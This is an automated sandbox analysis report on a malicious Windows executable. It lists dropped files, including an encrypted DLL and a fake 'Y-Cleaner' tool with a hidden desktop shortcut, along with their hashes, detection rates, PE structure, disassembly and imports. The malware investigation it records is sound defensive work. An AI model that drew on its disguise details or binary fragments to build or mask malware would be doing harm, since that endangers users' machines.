                                                Entropy (8bit):6.47050397947197
                                                Encrypted:false
                                                SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                Joe Sandbox View:
                                                • Filename: BDY5OFXpM9.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: univ.exe, Detection: malicious, Browse
                                                • Filename: univ.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: CSBls4grBI.exe, Detection: malicious, Browse
                                                • Filename: SecuriteInfo.com.Win32.CrypterX-gen.27154.11356.exe, Detection: malicious, Browse
                                                • Filename: SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.589.31532.exe, Detection: malicious, Browse
                                                • Filename: file.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\download[1].htm

                                                Download File
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:V:V
                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                Malicious:false
                                                Preview:0

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\fuckingdllENCR[1].dll

                                                Download File
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):97296
                                                Entropy (8bit):7.9982317718947025
                                                Encrypted:true
                                                SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                Malicious:false
                                                Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

                                                C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Bunifu_UI_v1.5.3.dll

                                                Download File
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):242176
                                                Entropy (8bit):6.47050397947197
                                                Encrypted:false
                                                SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):1502720
                                                Entropy (8bit):7.646111739368707
                                                Encrypted:false
                                                SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 75%
                                                • Antivirus: Virustotal, Detection: 60%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                C:\Users\user\Desktop\Cleaner.lnk

                                                Download File
                                                Process:C:\Users\user\Desktop\nRGKqzVQRt.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Tue Oct 8 01:24:39 2024, mtime=Tue Oct 8 01:24:39 2024, atime=Tue Oct 8 01:24:39 2024, length=1502720, window=hide
                                                Category:dropped
                                                Size (bytes):2130
                                                Entropy (8bit):3.766579029471561
                                                Encrypted:false
                                                SSDEEP:24:8/SuZDwlXnoXb+R54gK1FDS6A5asvNKLALvO4ZaqLmczqygm:8/SuZDwlYCRgDQUsvNKLALvZaqLIyg
                                                MD5:F4C05B493146612E0EEFB3BB571617C7
                                                SHA1:03FD1BE52006CAA39ACE14BEE8B27808694B37EF
                                                SHA-256:81BB2249B78BC51DD125C1EFC506E9682D52618BA4D40098F1DB23F3317F3B66
                                                SHA-512:C715FDCD8349CD2EBCE0AC54BC78D5F23AB12E832032F224DC158DBA8CE7396CFF95CFC203BB68D7BF9D13582167E1FB197A7BF74FE1188E58C71FFBAD50FCE8
                                                Malicious:false
                                                Preview:L..................F.@.. ...[[):)....+:)....+:)...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S...k.+.).....2:).......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2HY.............................^.A.p.p.D.a.t.a...B.P.1.....HY....Local.<......EW<2HY......[.....................;'..L.o.c.a.l.....N.1.....HY....Temp..:......EW<2HY......^......................c..T.e.m.p.....b.1.....HY....DV9E5W~1..J......HY..HY............................Db..D.V.9.E.5.w.t.3.w.G.Z.3.....h.2.....HY.. .Y-CLEA~1.EXE..L......HY..HY............................'. .Y.-.C.l.e.a.n.e.r...e.x.e.......n...............-.......m...................C:\Users\user\AppData\Local\Temp\DV9E5wt3wGZ3\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.0.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.D.V.9.E.5.w.t.3.w.G.Z.3.\.Y.-.C.l.e.a.n.e.r...e.x.e.?.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.D.V.9.E.5.w.t.3.w.G.Z.3.\.Y.-.C.l.e.a.n.e.r...e.

                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                Download File
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.468616537615864
                                                Encrypted:false
                                                SSDEEP:6144:FzZfpi6ceLPx9skLmb0f4ZWSP3aJG8nAgeiJRMMhA2zX4WABluuNajDH5S:9ZHt4ZWOKnMM6bFpMj4
                                                MD5:953AA484262C7942686C8FBABF395EE4
                                                SHA1:CE4969FCC0843909C6B3C017A93B6F934372B728
                                                SHA-256:4FCBC56817D2FA6A4C38842356DBAB787940BB659F61A5FBFA9FE075B34FAF41
                                                SHA-512:45FD4C2C23D8E818CC2208BE92FC9239D26CB128E41E14DAFA114249CBFCEFAEF3E7214664597612E6E83F9B0B1DD607A0FFA6C4F374C364E026993073CA404F
                                                Malicious:false
                                                Preview:regfO...O....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.~.$)...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):6.488874466807352
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:nRGKqzVQRt.exe
                                                File size:465'920 bytes
                                                MD5:75c689774e5b58a3c4ced392928b6053
                                                SHA1:6df791246e3cf66eaca12d98c0d92a686423316f
                                                SHA256:6bfff4412fcb97df9d2a431f513eca541576330aed2859ecba479daa8831e47e
                                                SHA512:6d3bc7eb3822c2f722e5878e79b0484d2001dcaa2badd114143a5e13bb8017af2360e52c0e8accbc81bdf1d3d966434c46b832edce69de1d3bbc7c99fc1be9bd
                                                SSDEEP:6144:CD+iX4dXR1M2Wg6TiJrUU5HNJU1oP6lG8iOaT+y6BbOkT0:YF8W2uOUObylG8ouNOM
                                                TLSH:FFA4BF02A2DDEE71E6E246318D3DE7E4365DB8528F25279B339C6A2F1B702D1C272315
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............T...T...T..%T...T...T...T...T...T..(T...T...Ts..T...T...T..!T...T..&T...TRich...T........PE..L...C..e.................".

                                                File Icon

                                                Icon Hash:d7a99a8a8651790c

                                                Static PE Info

                                                General

                                                Entrypoint:0x440f42
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x65C7E543 [Sat Feb 10 21:06:11 2024 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:1
                                                File Version Major:5
                                                File Version Minor:1
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:1
                                                Import Hash:b9e90b72c18cbd740db39440a20246de

                                                Entrypoint Preview

                                                Instruction
                                                call 00007F148084F4ACh
                                                jmp 00007F148084B12Eh
                                                push dword ptr [0045AD34h]
                                                call dword ptr [00401134h]
                                                test eax, eax
                                                je 00007F148084B2A4h
                                                call eax
                                                push 00000019h
                                                call 00007F148084E91Eh
                                                push 00000001h
                                                push 00000000h
                                                call 00007F148084CE60h
                                                add esp, 0Ch
                                                jmp 00007F148084CE25h
                                                mov edi, edi
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 20h
                                                mov eax, dword ptr [ebp+08h]
                                                push esi
                                                push edi
                                                push 00000008h
                                                pop ecx
                                                mov esi, 004013F4h
                                                lea edi, dword ptr [ebp-20h]
                                                rep movsd
                                                mov dword ptr [ebp-08h], eax
                                                mov eax, dword ptr [ebp+0Ch]
                                                pop edi
                                                mov dword ptr [ebp-04h], eax
                                                pop esi
                                                test eax, eax
                                                je 00007F148084B2AEh
                                                test byte ptr [eax], 00000008h
                                                je 00007F148084B2A9h
                                                mov dword ptr [ebp-0Ch], 01994000h
                                                lea eax, dword ptr [ebp-0Ch]
                                                push eax
                                                push dword ptr [ebp-10h]
                                                push dword ptr [ebp-1Ch]
                                                push dword ptr [ebp-20h]
                                                call dword ptr [00401160h]
                                                leave
                                                retn 0008h
                                                mov edi, edi
                                                push ebp
                                                mov ebp, esp
                                                push ecx
                                                push ebx
                                                mov eax, dword ptr [ebp+0Ch]
                                                add eax, 0Ch
                                                mov dword ptr [ebp-04h], eax
                                                mov ebx, dword ptr fs:[00000000h]
                                                mov eax, dword ptr [ebx]
                                                mov dword ptr fs:[00000000h], eax
                                                mov eax, dword ptr [ebp+08h]
                                                mov ebx, dword ptr [ebp+0Ch]
                                                mov ebp, dword ptr [ebp-04h]
                                                mov esp, dword ptr [ebx-04h]
                                                jmp eax
                                                pop ebx
                                                leave
                                                retn 0008h
                                                pop eax
                                                pop ecx
                                                xchg dword ptr [esp], eax
                                                jmp eax
                                                pop eax
                                                pop ecx
                                                xchg dword ptr [esp], eax
                                                jmp eax
                                                pop eax
                                                pop ecx
                                                xchg dword ptr [esp], eax
                                                jmp eax

                                                Rich Headers

                                                Programming Language:
                                                • [ASM] VS2010 build 30319
                                                • [C++] VS2010 build 30319
                                                • [ C ] VS2010 build 30319
                                                • [IMP] VS2008 SP1 build 30729
                                                • [RES] VS2010 build 30319
                                                • [LNK] VS2010 build 30319

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x524ac0x78.text
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x6a0000x18720.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x525240x1c.text
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x3bb800x18.text
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3bb380x40.text
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x10000x224.text
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x521180x52200b13257a92856bae5eae8fcedaf5a7e78False0.7018050799086758data6.970623447290097IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .data0x540000x120e40x640032df757b6cb131e0796eda9c7367ddd9False0.088046875data1.291504807816535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .vuri0x670000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .gocezi0x680000xd60x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .xolu0x690000x4000x4000f343b0931126a20f133d67c2b018a3bFalse0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x6a0000x187200x18800b88aed87326187b25c59a63350835409False0.4584861288265306data5.361393944268492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_CURSOR0x7d1900x330Device independent bitmap graphic, 48 x 96 x 1, image size 00.1948529411764706
                                                RT_CURSOR0x7d4c00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.33223684210526316
                                                RT_CURSOR0x7d6180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2953091684434968
                                                RT_CURSOR0x7e4c00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.46705776173285196
                                                RT_CURSOR0x7ed680x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5361271676300579
                                                RT_CURSOR0x7f3000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.30943496801705755
                                                RT_CURSOR0x801a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.427797833935018
                                                RT_CURSOR0x80a500x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.5469653179190751
                                                RT_ICON0x6a9100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3694029850746269
                                                RT_ICON0x6a9100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3694029850746269
                                                RT_ICON0x6b7b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4553249097472924
                                                RT_ICON0x6b7b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4553249097472924
                                                RT_ICON0x6c0600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.4619815668202765
                                                RT_ICON0x6c0600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.4619815668202765
                                                RT_ICON0x6c7280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4552023121387283
                                                RT_ICON0x6c7280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4552023121387283
                                                RT_ICON0x6cc900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.2682572614107884
                                                RT_ICON0x6cc900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.2682572614107884
                                                RT_ICON0x6f2380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.3074577861163227
                                                RT_ICON0x6f2380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.3074577861163227
                                                RT_ICON0x702e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3599290780141844
                                                RT_ICON0x702e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3599290780141844
                                                RT_ICON0x707b00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.7910447761194029
                                                RT_ICON0x707b00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.7910447761194029
                                                RT_ICON0x716580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.8086642599277978
                                                RT_ICON0x716580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.8086642599277978
                                                RT_ICON0x71f000x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.8244219653179191
                                                RT_ICON0x71f000x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.8244219653179191
                                                RT_ICON0x724680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilIndia0.6826763485477179
                                                RT_ICON0x724680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TamilSri Lanka0.6826763485477179
                                                RT_ICON0x74a100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TamilIndia0.7319418386491557
                                                RT_ICON0x74a100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TamilSri Lanka0.7319418386491557
                                                RT_ICON0x75ab80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TamilIndia0.7659836065573771
                                                RT_ICON0x75ab80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TamilSri Lanka0.7659836065573771
                                                RT_ICON0x764400x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilIndia0.8093971631205674
                                                RT_ICON0x764400x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TamilSri Lanka0.8093971631205674
                                                RT_ICON0x769100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.3784648187633262
                                                RT_ICON0x769100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.3784648187633262
                                                RT_ICON0x777b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.5058664259927798
                                                RT_ICON0x777b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.5058664259927798
                                                RT_ICON0x780600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5599078341013825
                                                RT_ICON0x780600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5599078341013825
                                                RT_ICON0x787280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.583092485549133
                                                RT_ICON0x787280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.583092485549133
                                                RT_ICON0x78c900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.37053941908713695
                                                RT_ICON0x78c900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.37053941908713695
                                                RT_ICON0x7b2380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.41228893058161353
                                                RT_ICON0x7b2380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.41228893058161353
                                                RT_ICON0x7c2e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.40081967213114755
                                                RT_ICON0x7c2e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.40081967213114755
                                                RT_ICON0x7cc680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.46897163120567376
                                                RT_ICON0x7cc680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.46897163120567376
                                                RT_DIALOG0x812480x58data0.8977272727272727
                                                RT_STRING0x812a00x2c6dataTamilIndia0.4830985915492958
                                                RT_STRING0x812a00x2c6dataTamilSri Lanka0.4830985915492958
                                                RT_STRING0x815680x6b4dataTamilIndia0.42657342657342656
                                                RT_STRING0x815680x6b4dataTamilSri Lanka0.42657342657342656
                                                RT_STRING0x81c200x242dataTamilIndia0.4982698961937716
                                                RT_STRING0x81c200x242dataTamilSri Lanka0.4982698961937716
                                                RT_STRING0x81e680x620dataTamilIndia0.4343112244897959
                                                RT_STRING0x81e680x620dataTamilSri Lanka0.4343112244897959
                                                RT_STRING0x824880x292dataTamilIndia0.4817629179331307
                                                RT_STRING0x824880x292dataTamilSri Lanka0.4817629179331307
                                                RT_ACCELERATOR0x7d1480x48dataTamilIndia0.8472222222222222
                                                RT_ACCELERATOR0x7d1480x48dataTamilSri Lanka0.8472222222222222
                                                RT_GROUP_CURSOR0x7d5f00x22data1.0294117647058822
                                                RT_GROUP_CURSOR0x7f2d00x30data0.9375
                                                RT_GROUP_CURSOR0x80fb80x30data0.9375
                                                RT_GROUP_ICON0x768a80x68dataTamilIndia0.7019230769230769
                                                RT_GROUP_ICON0x768a80x68dataTamilSri Lanka0.7019230769230769
                                                RT_GROUP_ICON0x707480x68dataTamilIndia0.6826923076923077
                                                RT_GROUP_ICON0x707480x68dataTamilSri Lanka0.6826923076923077
                                                RT_GROUP_ICON0x7d0d00x76dataTamilIndia0.6779661016949152
                                                RT_GROUP_ICON0x7d0d00x76dataTamilSri Lanka0.6779661016949152
                                                RT_VERSION0x80fe80x25cdata0.5413907284768212

                                                Imports

                                                DLLImport
                                                KERNEL32.dllCommConfigDialogA, InterlockedIncrement, EnumCalendarInfoW, InterlockedDecrement, SetEnvironmentVariableW, QueryDosDeviceA, SetVolumeMountPointW, GetComputerNameW, GetTimeFormatA, GetTickCount, CreateNamedPipeW, LocalFlags, GetNumberFormatA, ClearCommBreak, TlsSetValue, GetEnvironmentStrings, SetFileShortNameW, LoadLibraryW, CopyFileW, _hread, GetCalendarInfoA, SetVolumeMountPointA, GetVersionExW, GetFileAttributesA, CreateProcessA, GetModuleFileNameW, CreateActCtxA, GetEnvironmentVariableA, GetShortPathNameA, CreateJobObjectA, GetConsoleAliasExesA, InterlockedExchange, GetStdHandle, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, GetProcAddress, EnumSystemCodePagesW, SetComputerNameA, SetFileAttributesA, GlobalFree, LoadLibraryA, LocalAlloc, CreateHardLinkW, GetNumberFormatW, CreateEventW, OpenEventA, FoldStringW, GlobalWire, EnumDateFormatsW, GetFileTime, WaitForDebugEvent, GetShortPathNameW, GetDiskFreeSpaceExA, GetCurrentProcessId, GetTempPathA, LCMapStringW, WriteConsoleW, ReadFile, GetLocaleInfoA, EnumCalendarInfoA, SetFilePointer, WriteConsoleInputW, VerifyVersionInfoW, GetProcessHeap, SetEndOfFile, FlushFileBuffers, GetConsoleMode, GetConsoleCP, SetStdHandle, CreateFileA, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, HeapFree, HeapReAlloc, GetCommandLineW, HeapSetInformation, GetStartupInfoW, RaiseException, RtlUnwind, HeapAlloc, WideCharToMultiByte, MultiByteToWideChar, GetCPInfo, IsProcessorFeaturePresent, HeapCreate, HeapSize, GetModuleHandleW, ExitProcess, InitializeCriticalSectionAndSpinCount, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, SetHandleCount, GetFileType, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, TlsAlloc, TlsGetValue, TlsFree, SetLastError, 